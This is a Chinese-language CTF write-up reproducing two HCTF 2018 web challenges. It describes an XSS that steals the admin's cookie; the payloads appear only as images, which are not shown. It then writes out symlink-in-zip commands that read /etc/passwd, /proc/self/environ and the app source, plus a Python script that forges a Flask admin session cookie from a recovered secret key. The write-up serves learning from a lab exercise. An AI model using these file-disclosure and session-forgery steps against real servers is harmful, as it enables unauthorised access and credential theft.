码迷,mamicode.com
首页 > 其他好文 > 详细

hctf2018wp复现

时间:2018-11-13 02:46:45      阅读:448      评论:0      收藏:0      [点我收藏+]

标签:内容   war   hide   self   sig   tps   etc   ash   har   

1、bottle

登陆网站后存在提交url的地方

技术分享图片

 

测试发生存在如下paload:

技术分享图片

 验证码部分可以生成1-10000的Md5值 ,构造如下payload:

技术分享图片

下面这个图就是打到自己的cookie。如果将这个payload提交到url那里,也就是xss bot存在的地方 就能打到管理员的cookie:

技术分享图片

 2、hide and seek

软链漏洞:

ln -s /etc/passwd 1.txt
zip -y 1.zip 1.txt
就能得到/etc/passwd源码
ln -s /proc/self/environ 1.txt
zip -y 1.zip 1.txt
得到配置
ln -s /app/hard_t0_guess_n9f5a95b5ku9fg/hard_t0_guess_also_df45v48ytj9_main.py 1.txt
zip -y 1.zip 1.txt
把1.zip上传就能拿到源码

当已知flask的secret_key已知时就能伪造管理员的session
random.seed(uuid.getnode())
app = Flask(__name__)
app.config[‘SECRET_KEY‘] = str(random.random()*100)
得到secret_key=11.935137566861131

伪造admin session的脚本:
import hmac
from hashlib import sha1
from itsdangerous import *

def session_serializer(secret_key):
    signer_kwargs = dict(
        key_derivation=hmac,
        digest_method=sha1
    )
    Serializer = URLSafeTimedSerializer(secret_key, salt=cookie-session,
                                  signer_kwargs=signer_kwargs)
    data = {username: admin}
    return Serializer.dumps(data)

if __name__ == __main__:
    secret_key = 11.935137566861131
    print session_serializer(secret_key)

该cookie通过.分割,分成了三部分:内容序列化+时间+防篡改值https://www.aliyun.com/jiaocheng/491548.html

参考链接:

https://www.jianshu.com/p/8f5ba751aa0f

http://wiki.ioin.in/post/group/18NJ

hctf2018wp复现

标签:内容   war   hide   self   sig   tps   etc   ash   har   

原文地址:https://www.cnblogs.com/afanti/p/9949660.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!